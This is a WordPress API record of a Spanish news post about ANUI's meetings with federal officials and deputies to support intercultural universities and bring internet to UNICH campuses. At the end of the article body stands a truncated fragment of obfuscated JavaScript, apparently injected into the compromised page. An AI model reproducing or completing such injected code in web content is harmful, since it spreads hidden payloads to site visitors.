{"id":18060,"date":"2024-09-26T02:26:19","date_gmt":"2024-09-26T02:26:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18060"},"modified":"2024-09-26T02:26:20","modified_gmt":"2024-09-26T02:26:20","slug":"integrantes-de-la-anui-buscan-fortalecer-universidades-interculturales-del-pais","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18060","title":{"rendered":"Integrantes de la ANUI buscan fortalecer Universidades Interculturales del pa\u00eds"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1008\" height=\"821\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.54.16-PM.jpeg\" alt=\"\" class=\"wp-image-18061\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.54.16-PM.jpeg 1008w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.54.16-PM-300x244.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.54.16-PM-768x626.jpeg 768w\" sizes=\"auto, (max-width: 1008px) 100vw, 1008px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>25 de septiembre del 2024. SCLC.- El presidente de la Asociaci\u00f3n Nacional de Universidades Interculturales (ANUI), Dionicio Toledo Hern\u00e1ndez, y tambi\u00e9n rector de la Universidad Intercultural de Chiapas (UNICH) , sostuvo una reuni\u00f3n con Michel Inostroza, Gerente de planeaci\u00f3n de la Comisi\u00f3n Federal de Electricidad(CFE), Telecomunicaciones e Internet para todos, para la gesti\u00f3n de servicios de internet para las universidades Interculturales del pa\u00eds, iniciando con la UNICH, en una primera etapa con las sedes de Oxchuc, Valle Tulija, Bachajon y el Porvenir, Chiapas.<\/p>\n\n\n\n<p>El Rector de la UNICH, agradeci\u00f3 la atenci\u00f3n prestada a la mesa directiva de la ANUI de partes de los funcionarios p\u00fablicos, y afirm\u00f3 seguir\u00e1n siempre buscando mejorar las condiciones de la educaci\u00f3n superior Intercultural en Chiapas, en beneficio de los estudiantes, docentes, administrativos y directivos, &#8220;Juntos por una Educaci\u00f3n Intercultural cr\u00edtica en M\u00e9xico&#8221;.<\/p>\n\n\n\n<p>De la misma forma, inform\u00f3 que el pasado martes 24 de septiembre del 2024, integrantes de la mesa directiva de la ANUI, integrados tambi\u00e9n por Alterio Ramos P\u00e9rez, vicepresidente; Ulises Tamayo, secretario; Catalina Su\u00e1rez D\u00e1vila, Secretaria de finanzas y Ram\u00f3n Guzm\u00e1n, como vocal, se reunieron para dar seguimiento a diversas gestiones ante la Subsecretaria de Educaci\u00f3n Superior (SES), dirigida por el Dr. Luciano Concheiro B\u00f3rquez Concheiro Borquez.<\/p>\n\n\n\n<p>En este encuentro indic\u00f3, estuvieron adem\u00e1s la Direcci\u00f3n General de Educaci\u00f3n Superior e Intercultural, Dra. Carmen Enedina Rodr\u00edguez Armenta; por la Coordinadora T\u00e9cnica de Planeaci\u00f3n y Gesti\u00f3n Administrativa y Responsable de Educaci\u00f3n Intercultural, Mtra. Mar\u00eda De Los \u00c1ngeles Gordillo Casta\u00f1eda y la Mtra. Marlen Gonz\u00e1lez.<\/p>\n\n\n\n<p>En este encuentro, Dionicio toledo refiri\u00f3 que aprovecharon el momento para la entrega de la memoria del Segundo Encuentro Nacional de Universidades Interculturales, realizado en Chiapas el a\u00f1o pasado.<\/p>\n\n\n\n<p>Este mismo d\u00eda, hizo menci\u00f3n, sostuvieron una pl\u00e1tica fruct\u00edfera en el Congreso de la Uni\u00f3n, con diputados de la LXVI Legislatura, de Chiapas, Alfredo V\u00e1zquez y Sonia Rinc\u00f3n, de Tabasco, Tey Mollinedo, de Colima, Leoncio A. Mor\u00e1n S\u00e1nchez y Griselda Valencia de la Mora, y del Estado de M\u00e9xico, Francisco Javier Cabiedes Uranga; con qui\u00e9nes acordaron una agenda de trabajo encaminada al fortalecimiento de las universidades Interculturales del pa\u00eds.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 25 de septiembre del 2024. SCLC.- El presidente de la Asociaci\u00f3n Nacional de Universidades Interculturales (ANUI), Dionicio Toledo Hern\u00e1ndez, y tambi\u00e9n rector de la Universidad Intercultural de Chiapas (UNICH) , sostuvo una reuni\u00f3n con Michel Inostroza, Gerente de planeaci\u00f3n de la Comisi\u00f3n Federal de Electricidad(CFE), Telecomunicaciones e Internet para todos, para la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18061,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18060","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18060","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18060"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18060\/revisions"}],"predecessor-version":[{"id":18062,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18060\/revisions\/18062"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18061"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18060"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18060"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18060"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}